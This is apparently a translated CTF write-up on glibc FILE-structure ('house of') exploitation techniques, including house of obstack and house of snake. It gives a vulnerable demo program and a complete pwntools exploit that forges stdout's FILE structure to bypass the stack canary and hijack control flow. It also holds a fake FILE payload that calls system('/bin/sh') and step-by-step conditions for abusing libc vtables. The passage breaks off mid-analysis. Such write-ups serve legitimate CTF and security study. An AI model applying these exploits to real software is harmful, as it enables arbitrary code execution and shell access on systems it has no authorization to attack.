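The only call whose arguments can be controlled is the later _IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base) inside _IO_UNDERFLOW (fp). Because decide_maybe_mmap forcibly restores the vtables, the tampered vtable has no lasting effect to worry about

What happens if write(fp, &st, ??) runs with an uncontrolled rdx? It returns either 0 or a non-zero value, which brings us back to decide_maybe_mmap

If _IO_SYSSTAT (fp, &st) returns a non-zero value, the && short-circuits and the if body is skipped right away. If it returns 0, the remaining checks decide, so look at the definition of S_ISREG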

#define	__S_ISTYPE(mode, mask)	(((mode) & __S_IFMT) == (mask))  
#define S_ISREG(mode) __S_ISTYPE((mode), __S_IFREG)

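As you can see, the final check is an == comparison. Given what the stack data usually looks like, the probability of passing it is low.

There is also the st.st_size != 0 check. Since no real stat logic ran and the stack is left as it was, the probability of passing this if is low.

If it is still too likely, just make fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size false.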
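The condition guarding the mmap branch can be modelled in Python to see which inputs keep us out of it. This is a rough sketch on a 64-bit target (so the 1MB size limit never applies); `enters_mmap_branch` is an illustrative name, and the value -1 for `_IO_pos_BAD` is an assumption about the glibc definition.

```python
S_IFMT = 0o170000   # file-type mask used by __S_ISTYPE
S_IFREG = 0o100000  # regular file
IO_POS_BAD = -1     # assumed value of _IO_pos_BAD


def enters_mmap_branch(stat_ret, st_mode, st_size, fp_offset):
    """Mirror of the if-condition in decide_maybe_mmap (64-bit case)."""
    return (
        stat_ret == 0
        and (st_mode & S_IFMT) == S_IFREG
        and st_size != 0
        and (fp_offset == IO_POS_BAD or fp_offset <= st_size)
    )


# A real regular file with a sane offset enters the branch ...
print(enters_mmap_branch(0, 0o100644, 10, IO_POS_BAD))
# ... a non-zero return value from the hijacked call skips it ...
print(enters_mmap_branch(5, 0o100644, 10, IO_POS_BAD))
# ... and so does a forged _offset larger than whatever st_size holds.
print(enters_mmap_branch(0, 0o100644, 10, 11))
```

Any single false term is enough, which is why forging `fp->_offset` works as a fallback when the stack garbage happens to look like a regular file.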

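Then decide_maybe_mmap runs to completion and the forged fp contents are left completely unchanged.

Next, _IO_UNDERFLOW of the _IO_file_jumps vtable is called and performs the read.

Here we can set the following (note that fake_file_start is the address of the fp we currently control):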

_IO_buf_base = fake_file_start  
_IO_buf_end = fake_file_start + 0x1c8 // 0x1c8 here includes the length of the wide data

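Now we can overwrite the fake FILE once more and enlarge the controlled range, so the wide data becomes controllable as well.

Back to the flow above: the next step is the _IO_WUNDERFLOW (fp) vtable call.

However, we have just regained control of fp through underflow, so this upcoming vtable call is under our control too.

Here we direct it as _IO_WUNDERFLOW(fp) -> _IO_wfile_underflow_maybe_mmap

We are back at the starting point, but this time things are different. In the previous step we already gained control of rdx, because the third argument of _IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base) is rdx = fp->_IO_buf_end - fp->_IO_buf_base

At this point we still have the same four steps:

  1. _IO_SYSSTAT (fp, &st) is called through the vtable and is passed a stack pointer
  2. decide_maybe_mmap finishes and restores the two vtables
  3. _IO_UNDERFLOW (fp) is called through the vtable
  4. _IO_WUNDERFLOW (fp) is called through the vtable

The difference is that _IO_SYSSTAT(fp, &st) can now point at any vtable function, because when we took control of fp the second time we overwrote the FILE's vtable again.

So we can now arrange _IO_SYSSTAT(fp, &st) -> _IO_new_file_read(fp, &st, rdx), and we have a stack overflow.

Unfortunately, decide_maybe_mmap is protected by a canary, so we cannot complete the stack overflow without first leaking the stack.

Because of how fileno is set, write(1,stack,rdx) is not possible either. Is there really no way out?

Next, enter _IO_default_xsputn and _IO_default_xsgetn.

Let's read the source of these two functions: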

size_t  
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count);
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}


size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}

These functions operate on the buffers inside fp. Each one has a key part worth noting:

_IO_default_xsgetn (FILE *fp, void *data, size_t n)   
==> __mempcpy(data, fp->_IO_read_ptr, n);
_IO_default_xsputn (FILE *f, const void *data, size_t n)
==> __mempcpy (f->_IO_write_ptr, data, n);
If we can guarantee
fp->_IO_read_end - fp->_IO_read_ptr == n  
f->_IO_write_end - f->_IO_write_ptr == n
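then __underflow and _IO_OVERFLOW are never entered, which reduces interference from other functions.

This leads to a bold idea: first copy the stack into a region we control, then write into that copy at an offset, and finally copy it back onto the stack. That bypasses the canary cleanly, with no need to leak it.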

[[./houseofsome2.png]]
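The copy-out, patch, copy-back idea can be illustrated with a toy model in plain Python. It is only a sketch of the data movement, not of the libc calls: the frame size 0x1c8 and the patch offset 0xc8 mirror the constants used in the exp below, while `CANARY_OFF`, the fake canary bytes and `bounce_overwrite` are made up for illustration.

```python
def bounce_overwrite(stack, patch_off, patch):
    """Patch `stack` through a scratch copy, leaving all other bytes intact."""
    scratch = bytearray(stack)                          # 1. stack -> controlled area
    scratch[patch_off:patch_off + len(patch)] = patch   # 2. offset write into the copy
    stack[:] = scratch                                  # 3. controlled area -> stack
    return stack


CANARY_OFF = 0xb8  # hypothetical canary position inside the copied frame
RET_OFF = 0xc8     # offset skipped by the second _IO_buf_base in the exp

frame = bytearray(0x1c8)
frame[CANARY_OFF:CANARY_OFF + 8] = b"\x00SECRET!"  # unknown to the attacker
frame[RET_OFF:RET_OFF + 8] = (0x401234).to_bytes(8, "little")

bounce_overwrite(frame, RET_OFF, (0xdeadbeaf).to_bytes(8, "little"))
print(frame[CANARY_OFF:CANARY_OFF + 8], hex(int.from_bytes(frame[RET_OFF:RET_OFF + 8], "little")))
```

The attacker never needs to know the canary value, because the bytes in front of the patched offset travel out and back unchanged.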

demo.c

// gcc demo.c -o demo
#include <stdio.h>
#include <stdlib.h> // malloc
#include <unistd.h> // read

int main(){
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
int c;
printf("[+] printf: %p\n", &printf);
while (1) {
puts(
"1. add heap.\n"
"2. write libc.\n"
"3. exit");
printf("> "
);
scanf("%d", &c);
if(c == 1) {
int size;
printf("size> ");
scanf("%d", &size);
char *p = malloc(size);
printf("[+] done %p\n", p);
printf("content> ");
read(0, p, size);
} else if(c == 2){
size_t addr, size;
printf("size> ");
scanf("%zu", &size); // %zu matches size_t
printf("addr> ");
scanf("%zu", &addr);
printf("content> ");
read(0, (char*)addr, size);
} else {
break;
}
}
}

exp

from pwn import *  
context.log_level = 'debug'
context.arch = 'amd64'

tob = lambda x: str(x).encode()
io = process("./demo")

io.recvuntil(b"[+] printf: ")
printf_addr = int(io.recvuntil(b"\n", drop=True), 16)
log.success(f"printf_addr: {printf_addr:#x}")

def add(size):
    io.sendlineafter(b"> ", b"1")
    io.sendlineafter(b"size> ", tob(size))

def write(addr, size, content):
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"size> ", tob(size))
    io.sendlineafter(b"addr> ", tob(addr))
    io.sendafter(b"content> ", content)

def leave():
    io.sendlineafter(b"> ", b"3")

libc = ELF("./libc.so.6", checksec=False)
libc_base = printf_addr - libc.symbols["printf"]
libc.address = libc_base
log.success(f"libc_base: {libc_base:#x}")

_IO_wfile_jumps_maybe_mmap = libc.address + 0x215f40
log.success(f"_IO_wfile_jumps_maybe_mmap: {_IO_wfile_jumps_maybe_mmap:#x}")
_IO_str_jumps = libc.address + 0x2166c0
log.success(f"_IO_str_jumps: {_IO_str_jumps:#x}")
_IO_default_xsputn = _IO_str_jumps + 0x38
_IO_default_xsgetn = _IO_str_jumps + 0x40

# Directly overwrite the contents of _IO_2_1_stdout_ here
write(libc.symbols["_IO_2_1_stdout_"], 0xe0, flat({
0x0: 0x8000, # disable lock
0x38: libc.symbols["_IO_2_1_stdout_"], # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0x70: 0, # _fileno
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0x100, # only needs +0xe0 to be writable
0xc0: p32(0xffffffff), # _mode < 0
0xd8: _IO_wfile_jumps_maybe_mmap - 0x18,
}, filler=b"\x00"))

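# Copy the stack data to an address we control. Here it is copied to just before _IO_2_1_stdout_, which makes the next write convenient and also completes the third takeover of fp
io.send(flat({
0x8: libc.symbols["_IO_2_1_stdout_"], # needs a writable address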

0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsputn - 0x90, # vtable
0x28: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_write_ptr
0x30: libc.symbols["_IO_2_1_stdout_"], # _IO_write_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}, filler=b"\x00"))

# Finally, the control flow can be hijacked to 0xdeadbeaf here
io.send(flat({
0: 0xdeadbeaf, # retn
0x1c8-0xc8: {
0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsgetn - 0x90, # vtable
0x08: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_read_ptr
0x10: libc.symbols["_IO_2_1_stdout_"] + (0x1c8 - 0xc8), # _IO_read_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}
}, filler=b"\x00"))

io.interactive()

house of 琴瑟琵琶 | house of obstack(2.34~2.36)

The _IO_obstack_file struct

struct _IO_obstack_file
{
struct _IO_FILE_plus file;
struct obstack *obstack;
};

struct obstack /* control current object in current chunk */
{
long chunk_size; /* preferred size to allocate chunks in */
struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
char *object_base; /* address of object we are building */
char *next_free; /* where to add next char to current object */
char *chunk_limit; /* address of char after current chunk */
union
{
PTR_INT_TYPE tempint;
void *tempptr;
} temp; /* Temporary for some macros. */
int alignment_mask; /* Mask of alignment for each object. */
/* These prototypes vary based on 'use_extra_arg', and we use
casts to the prototypeless function type in all assignments,
but having prototypes here quiets -Wstrict-prototypes. */
struct _obstack_chunk *(*chunkfun) (void *, long);
void (*freefun) (void *, struct _obstack_chunk *);
void *extra_arg; /* first arg for chunk alloc/dealloc funcs */
unsigned use_extra_arg : 1; /* chunk alloc/dealloc funcs take extra arg */
unsigned maybe_empty_object : 1; /* There is a possibility that the current
chunk contains a zero-length object. This
prevents freeing the chunk if we allocate
a bigger chunk to replace it. */
unsigned alloc_failed : 1; /* No longer used, as we now call the failed
handler on error, but retained for binary
compatibility. */
};

_IO_obstack_overflow

  • Call chain
  1. _IO_obstack_overflow

    static int _IO_obstack_overflow (FILE *fp, int c)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
    int size;

    /* Make room for another character. This might as well allocate a
    new chunk a memory and moves the old contents over. */
    assert (c != EOF); // not controllable here
    obstack_1grow (obstack, c);

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);

    return c;
    }

  2. obstack_1grow (obstack, c)

  3. _obstack_newchunk (__o, 1)

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

_IO_obstack_xsputn (preferred)

  • Call chain
  1. _IO_obstack_xsputn

    static size_t _IO_obstack_xsputn (FILE *fp, const void *data, size_t n)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;

    if (fp->_IO_write_ptr + n > fp->_IO_write_end)
    {
    int size;

    /* We need some more memory. First shrink the buffer to the
    space we really currently need. */
    obstack_blank_fast (obstack, fp->_IO_write_ptr - fp->_IO_write_end);

    /* Now grow for N bytes, and put the data there. */
    obstack_grow (obstack, data, n); // this is the call we follow

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);
    }
    else
    fp->_IO_write_ptr = __mempcpy (fp->_IO_write_ptr, data, n);

    return n;
    }

  2. obstack_grow (obstack, data, n)

    obstack_grow(obstack, data, n);
    Definition:
    # define obstack_grow(OBSTACK, where, length) \
    __extension__ \
    ({ struct obstack *__o = (OBSTACK); \
    int __len = (length); \
    if (__o->next_free + __len > __o->chunk_limit) \
    _obstack_newchunk (__o, __len); \
    memcpy (__o->next_free, where, __len); \
    __o->next_free += __len; \
    (void) 0; })
    Expansion:
    ({
    struct obstack *__o = (obstack);
    int __len = (n);
    if (__o->next_free + __len > __o->chunk_limit)_obstack_newchunk(__o, __len);
    memcpy(__o->next_free, data, __len);
    __o->next_free += __len;
    (void) 0;
    });

  3. _obstack_newchunk (__o, __len)

    void _obstack_newchunk(struct obstack *h, int length) {
    struct _obstack_chunk *old_chunk = h->chunk;
    struct _obstack_chunk *new_chunk;
    long new_size;
    long obj_size = h->next_free - h->object_base;
    long i;
    long already;
    char *object_base;

    /* Compute size for new chunk. */
    new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
    if (new_size < h->chunk_size)
    new_size = h->chunk_size;

    /* Allocate and initialize the new chunk. */
    new_chunk = CALL_CHUNKFUN(h, new_size); // where the function pointer is called
    ...
    }

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

    new_chunk = CALL_CHUNKFUN(h, new_size);
    Definition:
    #define CALL_CHUNKFUN(h, size) \
    (((h)->use_extra_arg) \
    ? (*(h)->chunkfun)((h)->extra_arg, (size)) \
    : (*(struct _obstack_chunk * (*) (long) )(h)->chunkfun)((size)))
    Expansion:
    (((h)->use_extra_arg) ? (*(h)->chunkfun)((h)->extra_arg, (new_size)) : (*(struct _obstack_chunk *(*) (long) )(h)->chunkfun)((new_size)))
    The first argument is controllable; ((h)->use_extra_arg) must also be 1

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

[[./houseofobstack1.png]]

The exp is as follows:

fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(system_addr) # function to execute
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # rdi for the executed function
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # triggers _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # because this is a largebin attack: 0xd8=0xe8-0x10
# pause()

# contents stored at the address used as rdi for the executed function
payload = fake_io_file+ b'/bin/sh\x00'
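The magic offsets in this payload can be derived from the struct obstack definition shown earlier. The sketch below does that arithmetic; it assumes x86-64 field offsets (the int alignment_mask padded to 8 bytes) and assumes that fake_io_addr is the chunk header, so the payload starts 0x10 bytes later, as the largebin comment in the exp suggests. `OBSTACK_OFFSETS` and `payload_offset` are illustrative names.

```python
# Assumed x86-64 field offsets of struct obstack, read off the definition above.
OBSTACK_OFFSETS = {
    "chunk_size": 0x00,
    "chunk": 0x08,
    "object_base": 0x10,
    "next_free": 0x18,
    "chunk_limit": 0x20,
    "temp": 0x28,
    "alignment_mask": 0x30,
    "chunkfun": 0x38,
    "freefun": 0x40,
    "extra_arg": 0x48,
    "use_extra_arg": 0x50,  # first bit of the bit-field word
}
CHUNK_HEADER = 0x10  # assumption: payload is the chunk's user data


def payload_offset(obstack_rel, field):
    """Payload offset of `field` for an obstack placed at fake_io_addr + obstack_rel."""
    return obstack_rel + OBSTACK_OFFSETS[field] - CHUNK_HEADER


for field in ("chunkfun", "extra_arg", "use_extra_arg"):
    print(f"{field}: payload offset {payload_offset(0x30, field):#x}")
```

With obstack_ptr = fake_io_addr + 0x30 this gives 0x58, 0x68 and 0x70, matching the ljust(0x58) padding and the p64 values that follow it in the exp.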

house of snake(house of obstack plus)

From libc-2.37 on, house of obstack turns into house of snake: _IO_obstack_jumps was removed, but a new _IO_jump_t struct, _IO_printf_buffer_as_file_jumps, was added.

static const struct _IO_jump_t _IO_printf_buffer_as_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, __printf_buffer_as_file_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, __printf_buffer_as_file_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};
The function __printf_buffer_as_file_overflow is defined as follows:
static inline bool __attribute_warn_unused_result__
__printf_buffer_has_failed(struct __printf_buffer *buf) {
return buf->mode == __printf_buffer_mode_failed;
}

static int
__printf_buffer_as_file_overflow(FILE *fp, int ch) {
struct __printf_buffer_as_file *file = (struct __printf_buffer_as_file *) fp;

__printf_buffer_as_file_commit(file);

/* EOF means only a flush is requested. */
if (ch != EOF)
__printf_buffer_putc(file->next, ch);

/* Ensure that flushing actually produces room. */
if (!__printf_buffer_has_failed(file->next)
&& file->next->write_ptr == file->next->write_end)
__printf_buffer_flush(file->next);

...
}
First, __printf_buffer_as_file_overflow casts the FILE struct to the __printf_buffer_as_file type. The relevant definitions are:
struct __printf_buffer
{
char *write_base;
char *write_ptr;
char *write_end;
uint64_t written;
enum __printf_buffer_mode mode;
};

struct __printf_buffer_as_file
{
/* Interface to libio. */
FILE stream;
const struct _IO_jump_t *vtable;

/* Pointer to the underlying buffer. */
struct __printf_buffer *next;
};
It then calls __printf_buffer_as_file_commit, which performs a few checks:
static void
__printf_buffer_as_file_commit (struct __printf_buffer_as_file *file)
{
/* Check that the write pointers in the file stream are consistent
with the next buffer. */
assert (file->stream._IO_write_ptr >= file->next->write_ptr);
assert (file->stream._IO_write_ptr <= file->next->write_end);
assert (file->stream._IO_write_base == file->next->write_base);
assert (file->stream._IO_write_end == file->next->write_end);

file->next->write_ptr = file->stream._IO_write_ptr;
}
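After that, whether __printf_buffer_putc is called depends on whether the argument ch is EOF. In FSOP, _IO_flush_all_lockp reaches the overflow function in the vtable through _IO_OVERFLOW (fp, EOF), so the ch argument of __printf_buffer_as_file_overflow is EOF. Even if __printf_buffer_putc were called, it would only do some arithmetic on the pointer bookkeeping, so we need not pay much attention to it.

Next, __printf_buffer_flush is called, provided that file->next->mode != __printf_buffer_mode_failed and file->next->write_ptr == file->next->write_end.

__printf_buffer_flush is defined as follows. It checks file->next->mode != __printf_buffer_mode_failed once more and then calls __printf_buffer_do_flush with file->next as the argument.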

#define Xprintf(n) __printf_##n
#define Xprintf_buffer_flush Xprintf (buffer_flush)
#define Xprintf_buffer Xprintf (buffer)

bool
Xprintf_buffer_flush (struct Xprintf_buffer *buf)
{
if (__glibc_unlikely (Xprintf_buffer_has_failed (buf)))
return false;

Xprintf (buffer_do_flush) (buf); // __printf_buffer_do_flush(buf)
...
}

If file->next->mode == __printf_buffer_mode_obstack (11), __printf_buffer_flush_obstack is called:

static void
__printf_buffer_do_flush (struct __printf_buffer *buf)
{
switch (buf->mode)
{
...
case __printf_buffer_mode_obstack:
__printf_buffer_flush_obstack ((struct __printf_buffer_obstack *) buf);
return;
}
...
}
The __printf_buffer_obstack struct is defined as follows:
struct __printf_buffer_obstack
{
struct __printf_buffer base;
struct obstack *obstack;
char ch;
};
If buf->base.write_ptr == &buf->ch + 1 holds, __printf_buffer_flush_obstack executes the obstack_1grow macro:
void
__printf_buffer_flush_obstack (struct __printf_buffer_obstack *buf)
{
...
if (buf->base.write_ptr == &buf->ch + 1)
{
obstack_1grow (buf->obstack, buf->ch);
...
}
...
}
The obstack_1grow macro expands as follows. As you can see, it calls _obstack_newchunk and passes buf->obstack as the argument.
Declared in: obstack.h
Definition:
# define obstack_1grow(OBSTACK, datum) \
__extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + 1 > __o->chunk_limit) \
_obstack_newchunk (__o, 1); \
obstack_1grow_fast (__o, datum); \
(void) 0; })
Expansion:
({
struct obstack *__o = (buf->obstack);
if (__o->next_free + 1 > __o->chunk_limit)_obstack_newchunk(__o, 1);
(*((__o)->next_free)++ = (buf->ch));
(void) 0;
})
_obstack_newchunk executes the CALL_CHUNKFUN macro, which is the same as in the House of 琴瑟琵琶 chain above:
void
_obstack_newchunk (struct obstack *h, int length)
{
...
struct _obstack_chunk *new_chunk;
...
new_chunk = CALL_CHUNKFUN (h, new_size);
...
}
In summary:

  1. In __printf_buffer_as_file_overflow:
    • file->next->mode != __printf_buffer_mode_failed && file->next->write_ptr == file->next->write_end
  2. In __printf_buffer_as_file_commit:
    • file->stream._IO_write_ptr >= file->next->write_ptr
    • file->stream._IO_write_ptr <= file->next->write_end
    • file->stream._IO_write_base == file->next->write_base
    • file->stream._IO_write_end == file->next->write_end
  3. In __printf_buffer_flush (through __printf_buffer_do_flush):
    • file->next->mode == __printf_buffer_mode_obstack
  4. In __printf_buffer_flush_obstack:
    • buf->base.write_ptr == &buf->ch + 1 <==> file->next->write_ptr == (char *) file->next + 0x30 + 1
  5. In the obstack_1grow macro:
    • ((struct __printf_buffer_obstack *) file->next)->obstack->next_free + 1 > ((struct __printf_buffer_obstack *) file->next)->obstack->chunk_limit
    • (h)->use_extra_arg is non-zero <==> ((struct __printf_buffer_obstack *) file->next)->obstack->use_extra_arg != 0
  6. The final call is ((struct __printf_buffer_obstack *) file->next)->obstack->chunkfun (((struct __printf_buffer_obstack *) file->next)->obstack->extra_arg)

[[./houseofsnake1.png]]
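When forging the structures it helps to check all of these constraints mechanically before sending the payload. The following is a minimal sketch of such a checker; the dictionary keys, `snake_violations` and `EXAMPLE` are hypothetical names, the 0x30 offset of `ch` assumes the x86-64 layout of the structs shown above, and the mode value 11 is the one quoted in the text.

```python
MODE_OBSTACK = 11  # __printf_buffer_mode_obstack, value quoted in the text
CH_OFFSET = 0x30   # assumed offset of `ch` in struct __printf_buffer_obstack


def snake_violations(s):
    """Return the list of house of snake constraints that the layout `s` breaks."""
    bad = []
    # __printf_buffer_as_file_commit asserts
    if not s["next_write_ptr"] <= s["io_write_ptr"] <= s["next_write_end"]:
        bad.append("commit: _IO_write_ptr outside [next->write_ptr, next->write_end]")
    if s["io_write_base"] != s["next_write_base"]:
        bad.append("commit: _IO_write_base != next->write_base")
    if s["io_write_end"] != s["next_write_end"]:
        bad.append("commit: _IO_write_end != next->write_end")
    # commit then copies _IO_write_ptr into next->write_ptr
    write_ptr = s["io_write_ptr"]
    if s["next_mode"] != MODE_OBSTACK:
        bad.append("do_flush: next->mode is not the obstack mode")
    if write_ptr != s["next_write_end"]:
        bad.append("overflow: next->write_ptr != next->write_end")
    if write_ptr != s["next_addr"] + CH_OFFSET + 1:
        bad.append("flush_obstack: write_ptr != &buf->ch + 1")
    # obstack_1grow / CALL_CHUNKFUN
    if not s["obstack_next_free"] + 1 > s["obstack_chunk_limit"]:
        bad.append("obstack_1grow: next_free + 1 <= chunk_limit")
    if not s["use_extra_arg"]:
        bad.append("CALL_CHUNKFUN: use_extra_arg is 0")
    return bad


# Made-up addresses that satisfy every constraint.
EXAMPLE = {
    "io_write_base": 0x4000, "io_write_ptr": 0x5031, "io_write_end": 0x5031,
    "next_addr": 0x5000, "next_write_base": 0x4000,
    "next_write_ptr": 0x4000, "next_write_end": 0x5031,
    "next_mode": MODE_OBSTACK,
    "obstack_next_free": 0x100, "obstack_chunk_limit": 0x100,
    "use_extra_arg": 1,
}
print(snake_violations(EXAMPLE))
```

Note that the checker applies the commit step first, because the write_ptr compared in steps 1 and 4 is the value copied from the FILE, not the one originally stored in the fake buffer.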

house of 秦月汉关

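Because puts calls strlen at its very start, we follow puts to find the real strlen. puts calls through strlen's PLT entry, and the PLT entry jumps to a slot shown as *ABS*@got.plt, which is where the real strlen address is stored. Overwriting that slot gets a shell.

house of 魑魅魍魉

Normally each kind of jump table exists only once, but _IO_helper_jumps is special. As shown below, a different table is generated depending on the value of COMPILE_WPRINTF, and the file is probably compiled twice when libc is built, so two _IO_helper_jumps tables are visible in memory, one of each kind. The COMPILE_WPRINTF == 0 one is generated first and the COMPILE_WPRINTF == 1 one second.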

#ifdef COMPILE_WPRINTF
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_wdefault_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT (xsputn, _IO_wdefault_xsputn),
JUMP_INIT (xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_wdefault_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#else
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_default_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, _IO_default_pbackfail),
JUMP_INIT (xsputn, _IO_default_xsputn),
JUMP_INIT (xsgetn, _IO_default_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_default_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#endif

Likewise, the helper_file that goes with each COMPILE_WPRINTF value differs; the difference is whether struct _IO_wide_data _wide_data; has to be forged.

struct helper_file
{
struct _IO_FILE_plus _f;
#ifdef COMPILE_WPRINTF
struct _IO_wide_data _wide_data;
#endif
FILE *_put_stream;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
};

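Likewise, there are two copies of _IO_helper_overflow in memory. Testing shows that with the COMPILE_WPRINTF == 0 variant, s->_IO_write_base ends up being the largebin fd_nextsize pointer during the attack, so it is forcibly overwritten and cannot be controlled. For convenience we use the _IO_helper_overflow generated with COMPILE_WPRINTF == 1. Its role in the attack is to control the three arguments of _IO_default_xsputn.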

static int _IO_helper_overflow (FILE *s, int c)
{
FILE *target = ((struct helper_file*) s)->_put_stream;
#ifdef COMPILE_WPRINTF
int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base;
if (used)
{
// With this chain, all three arguments are clearly under our control.
size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used);
if (written == 0 || written == WEOF)
return WEOF;
__wmemmove (s->_wide_data->_IO_write_base,
s->_wide_data->_IO_write_base + written,
used - written);
s->_wide_data->_IO_write_ptr -= written;
}
#else
// With this chain, _IO_write_ptr would sit on the largebin bk_nextsize pointer
int used = s->_IO_write_ptr - s->_IO_write_base;
if (used)
{
size_t written = _IO_sputn (target, s->_IO_write_base, used);
if (written == 0 || written == EOF)
return EOF;
memmove (s->_IO_write_base, s->_IO_write_base + written,
used - written);
s->_IO_write_ptr -= written;
}
#endif
return PUTC (c, s);
}

The function above makes it clear that when size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used) executes:

  • FILE *target = ((struct helper_file*) s)->_put_stream is controllable
